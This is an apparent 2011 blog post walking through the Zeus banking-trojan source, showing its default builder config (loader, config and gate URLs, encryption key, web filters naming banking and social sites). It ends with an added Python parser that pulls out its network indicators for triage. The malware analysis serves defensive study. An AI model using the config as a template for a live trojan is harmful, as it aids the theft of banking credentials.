Jun 11 2011 11:20PM GMT
Posted by: Dan O'Connor
zeus analysis, zeus botnet, zeus source code, zeus walkthrough
Zeus code walkthrough – Part 5
Having built my bot, it's worth looking at what the basic config file looks like.
entry "StaticConfig"
;botnet "btn1"
timer_config 60 1
timer_logs 1 1
timer_stats 20 1
url_config "http://localhost/config.bin"
remove_certs 1
disable_tcpserver 0
encryption_key "secret key"
end
entry "DynamicConfig"
url_loader "http://localhost/bot.exe"
url_server "http://localhost/gate.php"
file_webinjects "webinjects.txt"
entry "AdvancedConfigs"
;"http://advdomain/cfg1.bin"
end
entry "WebFilters"
"!*.microsoft.com/*"
"!http://*myspace.com*"
"https://www.gruposantander.es/*"
"!http://*odnoklassniki.ru/*"
"!http://vkontakte.ru/*"
"@*/login.osmp.ru/*"
"@*/atl.osmp.ru/*"
end
entry "WebDataFilters"
;"http://mail.rambler.ru/*" "passw;login"
end
entry "WebFakes"
;"http://www.google.com" "http://www.yahoo.com" "GP" "" ""
end
end
At this point we know what the encryption key, url_config, url_loader and url_server are. The rest will have to be traced back through the source code when we get there.
I am very interested in the webFakes listing.
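When triaging a recovered builder config like the one above, a small parser can pull out the settings the post has identified so far. This is an added example, not code from the original post or from the Zeus source; the function names and dictionary layout are hypothetical, and it assumes that lines starting with `;` are comments and that `entry`/`end` pairs nest the way the listing suggests.

```python
import shlex

# Constructed sample: a trimmed copy of the config listing shown in the post.
SAMPLE = '''entry "StaticConfig"
;botnet "btn1"
url_config "http://localhost/config.bin"
encryption_key "secret key"
end
entry "DynamicConfig"
url_loader "http://localhost/bot.exe"
url_server "http://localhost/gate.php"
entry "WebFilters"
"!*.microsoft.com/*"
"@*/login.osmp.ru/*"
end
end
'''

def parse_config(text):
    """Parse nested entry/end blocks into settings, bare quoted rows and child entries."""
    root = {"settings": {}, "rows": [], "entries": {}}
    stack = [root]
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith(";"):  # assumption: ';' marks a comment
            continue
        quoted_first = line.startswith('"')   # rows such as the WebFilters patterns
        tokens = shlex.split(line)            # honours the double-quoted values
        if tokens[0] == "entry" and not quoted_first and len(tokens) == 2:
            node = {"settings": {}, "rows": [], "entries": {}}
            stack[-1]["entries"][tokens[1]] = node
            stack.append(node)
        elif tokens == ["end"] and not quoted_first:
            if len(stack) == 1:
                raise ValueError(f"line {lineno}: 'end' without 'entry'")
            stack.pop()
        elif quoted_first:
            stack[-1]["rows"].append(tokens)
        else:
            stack[-1]["settings"][tokens[0]] = tokens[1:]
    if len(stack) != 1:
        raise ValueError("unterminated 'entry' block")
    return root

def network_indicators(node):
    """Collect every url_* setting, recursing into nested entries."""
    found = {k: v[0] for k, v in node["settings"].items() if k.startswith("url_") and v}
    for child in node["entries"].values():
        found.update(network_indicators(child))
    return found
```

The filter rows are stored verbatim, prefixes included, since the post has not yet traced what `!` and `@` mean in the source.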




